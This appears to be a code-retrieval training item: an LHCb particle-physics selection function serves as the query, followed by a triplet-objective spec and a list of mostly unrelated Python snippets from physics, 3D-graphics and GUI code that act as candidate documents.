def makeDstarPartial( name , config , DecayDescriptor , inputSel ) : daugCuts = "(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)" % locals()['config'] combCuts = "((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)" % locals()['config'] dstarCuts = "(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)" \ "& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)" % locals()['config'] _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor , DaughtersCuts = { "pi+" : daugCuts } , CombinationCut = combCuts , MotherCut = dstarCuts ) return Selection( name+'Sel', Algorithm = _Dstar, RequiredSelections = inputSel )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_selection ( self ,\n tag , \n algotype ,\n inputs , \n *args ,\n **kwargs ) :\n sel_tag = '%s_Selection' % tag\n sel_name = 'Sel%sFor%s' % ( tag , self.name() )\n #\n ## check existing selection\n #\n sel = self._selection ( sel_tag )\n if sel : return sel \n\n #\n ## adjust a bit the arguments\n if not kwargs.has_key('Preambulo') :\n kwargs ['Preambulo' ] = self['Preambulo']\n\n if not kwargs.has_key( 'ParticleCombiners' ) :\n kwargs ['ParticleCombiners'] = { '' : 'LoKi::VertexFitter:PUBLIC' } \n \n # \n ## use \"simple-selection\"\n #\n from PhysSelPython.Wrappers import SimpleSelection\n sel = SimpleSelection (\n sel_name ,\n algotype ,\n inputs , \n *args ,\n **kwargs )\n # \n return self._add_selection( sel_tag , sel )", "def from_selection(cls):\n guid = compas_rhino.select_point()\n return cls.from_guid(guid)", "def makeDstar2D0Pi( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n daugCuts = \"(TRCHI2DOF < %(Daug_TRCHI2DOF_MAX)s)\" % locals()['config']\n combCuts = \"((AM - AM1) < %(Dstar_AMDiff_MAX)s* MeV)\" % locals()['config']\n dstarCuts = \"(VFASPF(VCHI2/VDOF) < %(Dstar_VCHI2VDOF_MAX)s)\" \\\n \"& ((M - M1) < %(Dstar_MDiff_MAX)s* MeV)\" % locals()['config']\n\n _Dstar = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"pi+\" : daugCuts }\n , CombinationCut = combCuts\n , MotherCut = dstarCuts\n )\n\n return Selection( name+'Sel',\n Algorithm = _Dstar,\n RequiredSelections = inputSel\n )", "def create(cls, selection):\n\t\t\n\t\treturn cls({ true_selector: selection, false_selector: Selection.invert(selection) })", "def get_selection():\n\n selected = Gui.Selection.getSelectionEx()[0].SubObjects\n sel_len = len(selected)\n result = SelectionContainer()\n\n for _x in range(0, sel_len):\n\n shape_type = selected[_x].ShapeType\n\n if shape_type == 'Vertex':\n result.vertices.append(selected[_x])\n\n elif shape_type == 'Edge':\n\n if 'Line' in str(selected[_x].Curve):\n result.lines.append(selected[_x])\n else:\n result.curves.append(selected[_x])", "def curve_through_selection(*args):\n sel = cmds.ls(sl=True, fl=True)\n if not sel or len(sel)==1:\n cmds.warning(\"You need to select multiple things to create curve through!\")\n return()\n\n pList = []\n crvType = cmds.radioButtonGrp(widgets[\"crvSelRBG\"], q=True, sl=True)\n\n for obj in sel:\n if cmds.objectType(obj) in [\"transform\"]:\n pos = cmds.xform(obj, q=True, ws=True, rp=True)\n pList.append(pos)\n elif obj in cmds.filterExpand(sm=[28, 30, 31, 32, 34, 46]):\n pos = cmds.pointPosition(obj)\n pList.append(pos)\n\n #add points if only 2 (cv, ep) or 3 (cv) are given, and create the curve\n if crvType == 1:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n if len(pList) == 3:\n vec1 = [pList[1][0]-pList[0][0], pList[1][1]-pList[0][1], pList[1][2]-pList[0][2]]\n newPt1 =[pList[0][0] + (vec1[0]*0.05), pList[0][1] + (vec1[1]*0.05), pList[0][2] + (vec1[2]*0.05)]\n vec2 = [pList[1][0] - pList[2][0], pList[1][1] - pList[2][1], pList[1][2] - pList[2][2]]\n newPt2= [pList[2][0] + (vec2[0]*0.05), pList[2][1] + (vec2[1]*0.05), 
pList[2][2] + (vec2[2]*0.05)]\n pList.insert(1, newPt1)\n pList.insert(3, newPt2)\n crv = cmds.curve(d=3, p=pList, name=\"newCurve\")\n\n if crvType == 2:\n if len(pList) == 2:\n f = [float(sum(x)/2) for x in zip(*pList)]\n pList.insert(1, f)\n crv = cmds.curve(d=3, ep=pList, name=\"newCurve\")\n\n return(crv)", "def selectAdd(op):\n doc = op.GetDocument()\n doc.SetActiveObject(op, c4d.SELECTION_ADD)", "def get_gold_selection(self, pointer):\n raise NotImplementedError", "def makePseudoPsi( name\n , config\n , DecayDescriptor\n , inputSel\n ) :\n\n _daugCuts = \"(PT> %(D0PtLoose)s*MeV)\" % locals()['config']\n _combCuts = \"(APT> %(D0PtLoose)s*MeV)\" % locals()['config']\n\n _Psi = CombineParticles( DecayDescriptor = DecayDescriptor\n , DaughtersCuts = { \"D0\": _daugCuts }\n , CombinationCut = _combCuts\n , MotherCut = \"(VFASPF(VCHI2PDOF) < 10000)\"\n )\n\n return Selection( name+'Sel',\n Algorithm = _Psi,\n RequiredSelections = inputSel\n )", "def selectVertex(self, addToSelection: bool) -> None:\n ...", "def createSelector(self,type='select',speed=2.0):\n self.selector = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector.hide()\n ival = self.selector.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def createSelector2(self,type='select',speed=2.0):\n self.selector2 = self.loadObject(type, scale=2, parent=render, transparency=True, pos=Point2(0,0), glow=1)\n self.selector2.hide()\n ival = self.selector2.hprInterval((speed), Vec3(0, 0, 360))\n ival.loop()", "def makeSelection(self, selection=\"\"):\n\n\t\tif selection == \"\":\n\t\t\tprint \"usage: makeSelection(selection)\"\n\n\t\tsel_string = self.parseMacros(selection)\n\n\t\t# --- split by \";\" --- #\n\t\ttmp = []\n\t\tcols = []\n\t\tcols = sel_string.split(\";\")\n\t\tfor col in cols:\n\t\t\tinverse = False\n\t\t\tif col == \"\":\n\t\t\t\tcontinue\n\n\t\t\ttmp = string.split(col, \"=\")\n\t\t\tif \"!\" in tmp[0]:\n\t\t\t\tinverse = True\n\n\t\t\tif \"resi\" in tmp[0]:\n\t\t\t\tself.parseResI(tmp[1])\n\t\t\t\tself.invresi = inverse\n\t\t\telif \"resn\" in tmp[0]:\n\t\t\t\tself.parseResN(tmp[1])\n\t\t\t\tself.invresn = inverse\n\t\t\telif \"name\" in tmp[0]:\n\t\t\t\tself.parseAtom(tmp[1])\n\t\t\t\tself.invatom = inverse\n\t\t\telif \"element\" in tmp[0]:\n\t\t\t\tself.parseElement(tmp[1])\n\t\t\t\tself.invelement = inverse\t\n\t\t\telif \"chain\" in tmp[0]:\n\t\t\t\tself.parseChain(tmp[1])\n\t\t\t\tself.invchain = inverse\n\t\t\telif \"type\" in tmp[0]:\n\t\t\t\tself.parseType(tmp[1])\n\t\t\t\tself.invtype = inverse\n\t\t\telif \"cat\" in tmp[0]:\n\t\t\t\tself.parseCat(tmp[1])\n\t\t\t\tself.invcat = inverse\n\t\t\telif \"atomid\" in tmp[0]:\n\t\t\t\tself.parseAtomid(tmp[1])\n\t\t\t\tself.invatomid = inverse\n\t\t\telif \"BB\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O \")\n\t\t\t\tself.invatom = False\n\t\t\telif \"CEN\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O , CB \")\n\t\t\t\tself.invatom = False\n\t\t\telif \"SC\" in tmp[0]:\n\t\t\t\tself.parseAtom(\" N , CA , C , O \")\n\t\t\t\tself.invatom = True\n\t\t\telif \"HET\" in tmp[0]:\n\t\t\t\tself.parseType(\"HETATM\")\n\t\t\t\tself.invtype = inverse\n\t\t\telse:\n\t\t\t\tprint \"unrecognized selector: \",tmp[0]\n\t\t\t\tsys.exit()", "def 选择项目(self, n): # real signature unknown; restored from __doc__\n return self.Select(n)", "def _add_selection ( self , nick , sel ) :\n if not self.__selections_.has_key ( self.name() ) :\n self.__selections_[ self.name() ] = {} \n \n if self.__selections_[ 
self.name()].has_key( nick ) :\n raise AttributeError , \"Selection '%s'already exists \" % nick\n \n self.__selections_[ self.name() ][ nick ] = sel\n \n return sel", "def selectAdd(node):\n node['selected'].setValue(True)", "def from_selection(\n class_,\n selection,\n item_class=None,\n ):\n import abjad\n pitch_segment = abjad.PitchSegment.from_selection(selection)\n return class_(\n pitch_segment,\n item_class=item_class,\n )", "def makeDefault(name,inputSel) :\n from Configurables import OfflineVertexFitter\n Detached4mu = CombineParticles(\"Combine\"+name)\n Detached4mu.DecayDescriptor = \"B_s0 -> mu+ mu- mu+ mu-\"\n # Set the OfflineVertexFitter to keep the 4 tracks and not the J/Psi Kstar:\n Detached4mu.addTool( OfflineVertexFitter )\n Detached4mu.ParticleCombiners.update( { \"\" : \"OfflineVertexFitter\"} )\n Detached4mu.OfflineVertexFitter.useResonanceVertex = False\n Detached4mu.ReFitPVs = True\n Detached4mu.DaughtersCuts = { \"mu+\" : \"(TRCHI2DOF < 2.5 ) \"\\\n \" & (MIPCHI2DV(PRIMARY)> 9.)\"}\n \n Detached4mu.CombinationCut = \"(ADAMASS('B_s0')<1000*MeV) \"\\\n \"& (AMAXDOCA('')<0.3*mm)\"\n Detached4mu.MotherCut = \"(VFASPF(VCHI2/VDOF)<9) \"\\\n \"& (BPVDIRA > 0) \"\\\n \"& (BPVVDCHI2>100)\"\\\n \" & (M>4366.3) & (M<6366.3)\"\\\n \"& (BPVIPCHI2()< 25) \"\n \n\n return Selection (name,\n Algorithm = Detached4mu,\n RequiredSelections = inputSel)", "def instantiateNewCmd(self):\n return QadGRIPSTRETCHCommandClass(self.plugIn)", "def add_new_to_sel(self):\n self.parent().do_new(keep_sel=True)", "def make_odorant_selector(name):\n return dcc.Input(\n id=\"cid_%s\" % name,\n placeholder=\"Enter a PubChem ID number...\",\n type=\"number\",\n value=None,\n )", "def __init__(self, parent):\n # parent is the main frame of PyCorrFit\n self.parent = parent\n ## MYID\n # This ID is given by the parent for an instance of this class\n self.MyID = None\n ## Wrapping\n curvedict, labels = self.GetCurvedict()\n self.labels = labels\n self.Selector = UserSelectCurves(parent, curvedict,\n wrapper=self, labels=labels)\n # This is necessary for parent to deselect and select the tool\n # in the tools menu.\n self.Bind = self.Selector.Bind\n if self.parent.notebook.GetPageCount() == 0:\n self.Selector.sp.Disable()", "def addSelectedToCanvas(self):\n\n selected = self.moduleList.currentItem()\n module = selected.data(QtCore.Qt.UserRole)[0]\n\n index = self.pickerUI.characterTabs.currentIndex()\n widget = self.pickerUI.characterTabs.widget(index)\n characterNode = widget.property(\"charNode\")\n\n # get inst\n modType = cmds.getAttr(module + \".moduleType\")\n modName = cmds.getAttr(module + \".moduleName\")\n mod = __import__(\"RigModules.\" + modType, {}, {}, [modType])\n reload(mod)\n\n # get the class name from that module file (returns RigModules.ART_Root.ART_Root for example)\n moduleClass = getattr(mod, mod.className)\n\n # find the instance of that module\n moduleInst = moduleClass(self, modName)\n self.modules.append(moduleInst)\n\n scene = self.getCurrentCanvasTab()\n\n # find out if charNode has a namespace\n if cmds.objExists(characterNode + \".namespace\"):\n namespace = cmds.getAttr(characterNode + \".namespace\") + \":\"\n else:\n namespace = \"\"\n\n # pass in the network node and the namespace\n picker = moduleInst.pickerUI(scene.sceneRect().center(), self.pickerUI, module, namespace)\n scene.addItem(picker[0])\n self.pickerUI.selectionScriptJobs.append(picker[2])\n\n # =======================================================================\n # #mirror the module's pickerBorderItem 
if needed\n # =======================================================================\n if picker[1] == True:\n picker[0].setTransformOriginPoint(picker[0].boundingRect().center())\n picker[0].setTransform(QtGui.QTransform(-1.0, 0.0, 0.0, 1.0, picker[0].boundingRect().width() * 2, 0.0))\n\n children = picker[0].childItems()\n if children is not None:\n self.mirrorChildren(children)\n\n row = self.moduleList.row(selected)\n self.moduleList.takeItem(row)", "def select(*args, add: bool=True, addFirst: bool=True, all: bool=True, allDagObjects: bool=True,\n allDependencyNodes: bool=True, clear: bool=True, containerCentric: bool=True,\n deselect: bool=True, hierarchy: bool=True, noExpand: bool=True, replace: bool=True,\n symmetry: bool=True, symmetrySide: int=0, toggle: bool=True, visible: bool=True,\n **kwargs)->None:\n pass", "def select(self):\n\n return self.p[0], self.p[1]", "def db(r):\n ey = gQ(r)\n gR = b.tcl(\n 'global no_gizmo; set no_gizmo 1; in %s {%s -New} ; return [value [stack 0].name]' % (ey.fullName(), r.Class()))\n group = b.toNode('.'.join((ey.fullName(), gR)))\n group.setSelected(False)\n if ew(r):\n for node, gS in ew(r).iteritems():\n for c in gS:\n node.setInput(c, group)\n\n for c in range(r.inputs()):\n group.setInput(c, r.input(c))\n\n group.setXYpos(r.xpos(), r.ypos())\n group.readKnobs(r.writeKnobs(b.TO_SCRIPT))\n b.delete(r)\n return group", "def pass_selection_dR(self, dR):\n dR_max = self.cut_dict[self.sample_name][\"dR_cut\"]\n return self.pass_selection_val(val=dR, val_max=dR_max)", "def generate_kdtree(self):\n if self.method==2:\n coordinates = self.unassigned_data[0:3,:]\n else:\n coordinates = self.unassigned_data[0:2,:]\n tree = cKDTree(coordinates.T)\n\n return tree", "def make_selection(self, num):\n other_doors = None\n if num is 1:\n other_doors = [str(2), str(3)]\n elif num is 2:\n other_doors = [str(1), str(3)]\n elif num is 3:\n other_doors = [str(1), str(2)]\n\n reveal = str(random.choice(other_doors))\n other_doors.remove(reveal)\n third_door = random.choice(other_doors)\n other_doors.remove(third_door)\n\n main_door = getattr(self, 'door' + str(num) + '_counter')\n door_second = getattr(self, 'door' + reveal + '_counter')\n door_third = getattr(self, 'door' + third_door + '_counter')\n main_door_reveal = getattr(self, 'door'+str(num)+'_reveal')\n\n if (main_door is 0 and door_second is 0\n and door_third is 0):\n self.ids['door'+reveal].source = \\\n getattr(self, 'door'+reveal+'_reveal')\n self.ids['button'+reveal].disabled = True\n inc = getattr(self, 'door' + str(num) + '_counter')\n setattr(self, 'door' + str(num) + '_counter', inc + 1)\n elif main_door is 1 and door_second is 0 and door_third is 0:\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()\n elif main_door is 0 and (door_second is 1 or door_third is 1):\n for i in range(1, 4, 1):\n self.ids['door' + str(i)].source = \\\n getattr(self, 'door' + str(i) + '_reveal')\n self.ids['button'+str(i)].disabled = True\n if main_door_reveal in ['door-money.png']:\n self.win_popup()\n else:\n self.lose_popup()", "def get_selection(self, selection_name, format=None):", "def __call__(self) -> abjad.Selection:\n if (self._repetition_chance == 0.0\n or random.random() > self._repetition_chance):\n if not self._is_first_window or self._process_on_first_call:\n if self._mode == 'out':\n self._remove_element()\n 
else:\n self._add_element()\n elif not self._include_empty_measures and self._mode == 'in':\n self._add_element()\n self._mask_to_selection()\n return self.current_window", "def polySelect(*args, add: bool=True, addFirst: bool=True, asSelectString: bool=True, deselect:\n bool=True, edgeBorder: Union[int, List[int], bool]=0, edgeBorderPath:\n Union[List[int, int], List[List[int, int]], bool]=None, edgeBorderPattern:\n Union[List[int, int], List[List[int, int]], bool]=None, edgeLoop: Union[int,\n List[int], bool]=0, edgeLoopOrBorder: Union[int, List[int], bool]=0,\n edgeLoopOrBorderPattern: Union[List[int, int], List[List[int, int]], bool]=None,\n edgeLoopPath: Union[List[int, int], List[List[int, int]], bool]=None,\n edgeLoopPattern: Union[List[int, int], List[List[int, int]], bool]=None,\n edgeRing: Union[int, List[int], bool]=0, edgeRingPath: Union[List[int, int],\n List[List[int, int]], bool]=None, edgeRingPattern: Union[List[int, int],\n List[List[int, int]], bool]=None, edgeUVLoopOrBorder: Union[int, List[int],\n bool]=0, everyN: int=0, extendToShell: Union[int, List[int], bool]=0,\n noSelection: bool=True, replace: bool=True, shortestEdgePath: Union[List[int,\n int], List[List[int, int]], bool]=None, shortestEdgePathUV: Union[List[int, int],\n List[List[int, int]], bool]=None, shortestFacePath: Union[List[int, int],\n List[List[int, int]], bool]=None, toggle: bool=True, q=True, query=True,\n **kwargs)->Union[List[int], Any]:\n pass", "def selection(self):\n # create an empty priority queue for the new generation\n newGeneration = PriorityQueue()\n # pick top X of the population to survive\n for c in range(0, self.generation.qsize() / SELECTION_FRACTION):\n # get a chromosome\n chromosome = self.generation.get()\n # put the chromosomes in the new generation\n newGeneration.put(chromosome)\n # keep the new generation\n self.generation = newGeneration", "def new_piece(self):\n piece_type = pieces.PieceSelector.select_random_piece()\n return piece_type(game_config.NEXT_PIECE_POSX, game_config.NEXT_PIECE_POSY)", "def project(record, selected, pkey_name) -> StateDictInterface:\n if selected:\n keys = set(selected.keys()) | {pkey_name}\n return record.projection(keys)\n else:\n return record", "def from_selection(cls):\n guid = compas_rhino.select_mesh()\n return cls.from_guid(guid)", "def select(self):\n\t\tbest_num_components = self.n_constant\n\t\treturn self.base_model(best_num_components)", "def select(self):\n pass", "def select(self):\n pass", "def get_next_gp(self):\n next_gp = self.gpf_core.get_next_gp()[2]\n next_gp.build_posterior()\n return DragonflyGP(next_gp, self.options)", "def newDragBtn(self, color, selected, name, parent, width, height, tabIndex):\n btn = drag.DragButton(color, selected, self, name ) #create new draggable button\n btn.setParent(parent)\n btn.resize(width, height)\n btn.show() #show button\n logger.info(\"new button: %s\" % name)\n\n #add to objects dictionary\n if selected != None:\n for i in selected:\n if(i in self.objects[tabIndex]):\n self.objects[tabIndex][str(i)].append(btn) #add to array of buttons\n else:\n self.objects[tabIndex][str(i)]=[btn] #create array of buttons\n logger.debug(self.objects)\n else:\n logger.error(\"nothing is being connected to button\")\n\n return btn", "def select(self, new_pop, new_vals):\n raise NotImplemented(\n \"Method `EvolutionaryAlgorithm.select` should be implemented in subclasses!\")", "def instantiateNewCmd(self):\n return QadSTRETCHCommandClass(self.plugIn)", "def create_gui(self):\n\n selectors_widgets = 
list()\n\n for n in range(4):\n\n selectors_widgets.append(wd.Dropdown(\n options={'': 0, 'Orange': 1, 'Red': 2, 'Blue': 3, 'Green': 4},\n value=0,\n disabled=False,\n layout={'width': '148px'}\n ))\n\n self.confirm_button.on_click(\n self.create_combination_and_rate_function())\n self.user_interact.children = [self.selectors, self.confirm_button]\n\n self.selectors.children = selectors_widgets", "def to_pda(self) -> \"pda.PDA\":\n state = pda.State(\"q\")\n pda_object_creator = PDAObjectCreator(self._terminals, self._variables)\n input_symbols = {pda_object_creator.get_symbol_from(x)\n for x in self._terminals}\n stack_alphabet = {pda_object_creator.get_stack_symbol_from(x)\n for x in self._terminals.union(self._variables)}\n start_stack_symbol = pda_object_creator.get_stack_symbol_from(\n self._start_symbol)\n new_pda = pda.PDA(states={state},\n input_symbols=input_symbols,\n stack_alphabet=stack_alphabet,\n start_state=state,\n start_stack_symbol=start_stack_symbol)\n for production in self._productions:\n new_pda.add_transition(state, pda.Epsilon(),\n pda_object_creator.get_stack_symbol_from(\n production.head),\n state,\n [pda_object_creator.get_stack_symbol_from(x)\n for x in production.body])\n for terminal in self._terminals:\n new_pda.add_transition(state,\n pda_object_creator.get_symbol_from(\n terminal),\n pda_object_creator.get_stack_symbol_from(\n terminal),\n state, [])\n return new_pda", "def _create_features_dropdown(self, name=_features_dropdown):\n fts = sorted(self.features)\n d = Select(options=fts, css_classes=[self._features_dropdown], name=name)\n return d", "def _getAsSelection(self):\n return self._asSelection", "def softSelect(*args, compressUndo: Union[int, bool]=0, enableFalseColor: Union[int, bool]=0,\n softSelectColorCurve: Union[AnyStr, bool]=\"\", softSelectCurve: Union[AnyStr,\n bool]=\"\", softSelectDistance: Union[float, bool]=0.0, softSelectEnabled:\n Union[int, bool]=0, softSelectFalloff: Union[int, bool]=0, softSelectReset:\n bool=True, softSelectUVDistance: Union[float, bool]=0.0, q=True, query=True,\n e=True, edit=True, **kwargs)->Union[None, Any]:\n pass", "def select(self):\r\n pass", "def createGraphPoint(self, cls, newId):\n def getUniqueId(container, base):\n ids = set(container.objectIds())\n new = base\n i = 2\n while new in ids:\n new = '%s%s' % (base, i)\n i += 1\n return new\n newId = getUniqueId(self.graphPoints, newId)\n gp = cls(newId)\n # Set sequence\n if gp.isThreshold:\n gp.sequence = -1\n else:\n gp.sequence = len(self.graphPoints())\n # Set legend for graph points on multigraph reports\n if self.report() and hasattr(gp, 'legend'):\n # For MultiGraphReports we use a fancier legend\n # to differentiate when you have multiple devices/graphpoints\n # on a single graph\n gp.legend = gp.DEFAULT_MULTIGRAPH_LEGEND\n self.graphPoints._setObject(gp.id, gp)\n gp = self.graphPoints._getOb(gp.id)\n if gp.sequence == -1:\n self.manage_resequenceGraphPoints()\n return gp", "def __init__(self, pvID, pvP, pvQ, pvDescriptor):\n\n # TODO: implement this", "def pool_selected( self, object ):\n\t\tud.debug( ud.ADMIN, ud.INFO, 'UVMM.DW.ps(node_uri=%s)' % self.node_uri)\n\t\tpool_name = object.options.get('pool-name')\n\t\tif not pool_name:\n\t\t\tpool_name = object.options['pool-name'] = 'default'\n\t\tdrive_type = object.options['drive-type']\n\t\ttry:\n\t\t\tif drive_type == 'cdrom':\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 'cdrom')\n\t\t\telse:\n\t\t\t\tvols = self.uvmm.storage_pool_volumes(self.node_uri, pool_name, 
'disk' )\n\t\texcept uvmmd.UvmmError, e:\n\t\t\tvols = ()\n\t\tud.debug(ud.ADMIN, ud.INFO, 'UVMM.DW.ps: volumes=%s' % map(str, vols))\n\t\tchoices = []\n\t\tfor vol in vols:\n\t\t\tbasename = os.path.basename( vol.source )\n\t\t\tif '.' in basename:\n\t\t\t\tsuffix = basename[ basename.rfind( '.' ) + 1 : ]\n\t\t\t\tif suffix in ( 'xml', 'snapshot' ):\n\t\t\t\t\tcontinue\n\t\t\tchoices.append( basename )\n\t\tchoices.sort()\n\t\tself.image_syntax.update_choices( choices )\n\n\t\t# recreate pool button\n\t\tbtn = self._create_pool_select_button( object.options )\n\t\tself[DriveWizard.PAGE_OLD].options[0] = btn\n\t\tself[DriveWizard.PAGE_NEW].options[0] = btn\n\t\t# recreate driver-type button\n\t\titems = [self[DriveWizard.PAGE_NEW].options[2].id(), self[DriveWizard.PAGE_NEW].options[3].id()]\n\t\tbtn = self._create_type_select_button(object.options, items)\n\t\tself[DriveWizard.PAGE_NEW].options[1] = btn\n\n\t\tif drive_type == 'disk':\n\t\t\tself[DriveWizard.PAGE_OLD].hint = None\n\t\telif drive_type in ( 'cdrom', 'floppy' ):\n\t\t\tif self.image_syntax._choices:\n\t\t\t\tmsg = _( \"If the required image is not found it might be added by copying the file into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\telse:\n\t\t\t\tmsg = _( \"The list of available images is empty! To add an image the file needs to be copied into the storage pool, e.g. to /var/lib/libvirt/images/ which is the directory of the storage pool <i>local directory</i>. After that go to the previous page and return to this one. The image should now be listed.\" )\n\t\t\tself[DriveWizard.PAGE_OLD].hint = msg\n\t\t\tself[DriveWizard.PAGE_OLD].description = ''\n\t\telse:\n\t\t\traise ValueError('Invalid drive-type \"%s\"' % drive_type)\n\n\t\treturn self.type_selected(object)", "def create_pressure_vessel_geometry():\r\n\r\n # configure sigmoid function\r\n bounds_upper = [3, 6]\r\n h = 5\r\n w = 6\r\n\r\n sigmoid_function = lambda x: (1 / (1 + np.exp(-1 * h * x + w))) + 1\r\n\r\n sigmoid_function_reverse = lambda x: 1 / (1 + np.exp(h * x - w - 18)) + 1\r\n\r\n funcs_upper = [sigmoid_function, sigmoid_function_reverse]\r\n\r\n bounds_lower = None\r\n funcs_lower = 0\r\n\r\n x_max = 6\r\n x_min = 0\r\n resolution = 10000\r\n\r\n pressure_vessel = Geometry(x_max, x_min, resolution,\r\n bounds_upper, funcs_upper,\r\n bounds_lower, funcs_lower)\r\n\r\n return pressure_vessel", "def Gd():\n Pz=[8]\n Pp=[1,1]\n return Pz, Pp", "def sel2para(*args):\n return _ida_segment.sel2para(*args)", "def choose(self, g, c, p):\n ng = copy.deepcopy(g)\n ng[c[0]][c[1]] = p\n return ng", "def build_selection_spec(client_factory, name):\r\n sel_spec = client_factory.create('ns0:SelectionSpec')\r\n sel_spec.name = name\r\n return sel_spec", "def pairing_group_create(curve='MNT224'):\n return PairingGroup(curve)", "def _select(self):\n sel = []\n\n # choose randomly while favouring fit individuals\n lp = len(self.population) // 2\n for _ in range(lp):\n idx1 = idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n while idx1 == idx2:\n idx2 = int(math.sqrt(random.randrange(lp**2+1)))\n\n p1, p2 = self.population[idx1], self.population[idx2]\n sel.append((p1, p2))\n\n return sel", "def pick_grom_group(group, other, selected):\n\treturn Faction(over(group, selected), over(group + other, selected))", "def create_point(x_crd, y_crd):\n\n Point = namedtuple(\"Point\", \"x_crd y_crd\")\n 
return Point(x_crd, y_crd)", "def getSelector(self, node):\n self.checkModelOpen()\n calcEngine = CalcEngine.factory(self.client_session)\n return calcEngine.getSelector(node)", "def _select_single(self, disc):\n return QuadraticFieldClassNumbersTable._select_single(self, -disc)", "def select(self):\n return", "def select(self, test):\n survivors = []\n for particle in self.particles:\n # Find the originating particle\n parent = particle\n while parent.origin is not None:\n parent = parent.origin.initial_state[0]\n if test(parent, particle) is True:\n survivors.append(particle)\n return ParticleCollection(survivors)", "def select_operator(operators, weights, rnd_state):\n return rnd_state.choice(np.arange(0, len(operators)),\n p=weights / np.sum(weights))", "def active_selection():\r\n\r\n om.MGlobal.getActiveSelectionList()", "def __call__(self):\n new_node = Node()\n new_node.op = self\n return new_node", "def water_selection(self):\n sel_cache = self.pdb_hierarchy.atom_selection_cache()\n sel_str = \"({}) and element O and altloc ' '\".format(\n \" or \".join([ \"resname \" + i for i in WATER_RES_NAMES ]))\n return sel_cache.selection(sel_str).iselection()", "def __call__(self):\r\n new_node = Node()\r\n new_node.op = self\r\n return new_node", "def selectLinkedElement():\n\n collector = FilteredElementCollector(doc).ToElementIds()\n wrongAngle = []\n for id in collector:\n \n element= doc.GetElement(id)\n\n if element.get_Parameter(BuiltInParameter.FABRICATION_PART_ANGLE) is not None:\n try:\n chord = element.CenterlineLength\n angle = element.get_Parameter(BuiltInParameter.FABRICATION_PART_ANGLE).AsDouble()\n angle = degrees(angle)\n diameter = element.get_Parameter(BuiltInParameter.FABRICATION_PART_DIAMETER_IN).AsDouble()\n radius = ((360/angle)*chord )/(pi*2)\n \n if round(radius,4) == round(diameter,4):\n wrongAngle.append(id)\n\n except Exception as ex:\n print(ex, str(id))\n pass\n\n wrongAngle = List[ElementId](wrongAngle)\n uidoc.Selection.SetElementIds(wrongAngle)", "def select(self, *dims):\n return select(self, *dims)", "def selection(probs):\n # pick 2 parents out of this distribution\n t = [i for i in range(len(probs))]\n draw = choice(t, 2, p=probs, replace=False)\n return draw", "def __make_sel(selection):\n sel = []\n param = []\n for key, value in selection.iteritems(): \n if key == \"fn\":\n if value.find('%') >= 0:\n sel.append(\"irods_filepath like %s\")\n else:\n sel.append(\"irods_filepath = %s\")\n elif key == \"expid\":\n sel.append(\"exper_id = %s\".format(value))\n elif key == 'runnum':\n sel.append(\"runnum = %s\".format(value))\n elif key == 'status' and value:\n sel.append(\"status = %s\")\n else:\n continue\n param.append(value)\n\n q = \"WHERE {}\".format(\" AND \".join(sel)) if sel else \"\"\n return q, param", "def createAxisOperationsButtonAndMenu(self):\n button = QtGui.QToolButton()\n menu = QtGui.QMenu(self) \n \n opDefs = ['def default axis points',\n 'sum summation of selected axis points',\n 'avg average of selected axis points',\n 'wgt weighted average of selected axis points',\n 'awt altered weighted average of selected axis points',\n 'gtm geometrical mean of selected axis points',\n 'std standard deviation of selected axis points',]\n \n for op in opDefs:\n action = menu.addAction(op)\n self.connect(action, QtCore.SIGNAL('triggered ()'),\n self.selectAxesOperationEvent)\n\n button.setText(' def ')\n button.setMenu(menu)\n button.setPopupMode(QtGui.QToolButton.InstantPopup)\n\n # Connect Signals\n self.connect(button, 
QtCore.SIGNAL('clicked(bool)'),\n button.showMenu)\n\n return button", "def select_reg(self, r0, r1, add_zeros=False):\r\n # Retrieve database first and last registry entry values\r\n r0_db, r1_db = self.data.index[0], self.data.index[-1]\r\n\r\n # Check invalid input, if r1 > r1_db, add zeros or error.\r\n if r0 < r0_db or r0 >= r1 or r0 > r1_db:\r\n raise IndexError(f'{self} no possible reg selection'\r\n f' for {r0, r1}.')\r\n\r\n elif r1 > r1_db:\r\n if add_zeros:\r\n ind_appen = range(r1_db + 1, r1 + 1)\r\n ad = pd.DataFrame(0, index=ind_appen, columns=self.data.columns)\r\n self.data = self.data.append(ad)\r\n else:\r\n raise IndexError(f'{self} no possible reg selection for '\r\n f'{r0, r1} without adding zeros.')\r\n\r\n # Make the data selection\r\n self.data = self.data.loc[r0: r1 - 1, :]", "def pions ( self ) :\n from GaudiConfUtils.ConfigurableGenerators import FilterDesktop\n ##\n if self['NOPIDHADRONS'] :\n from 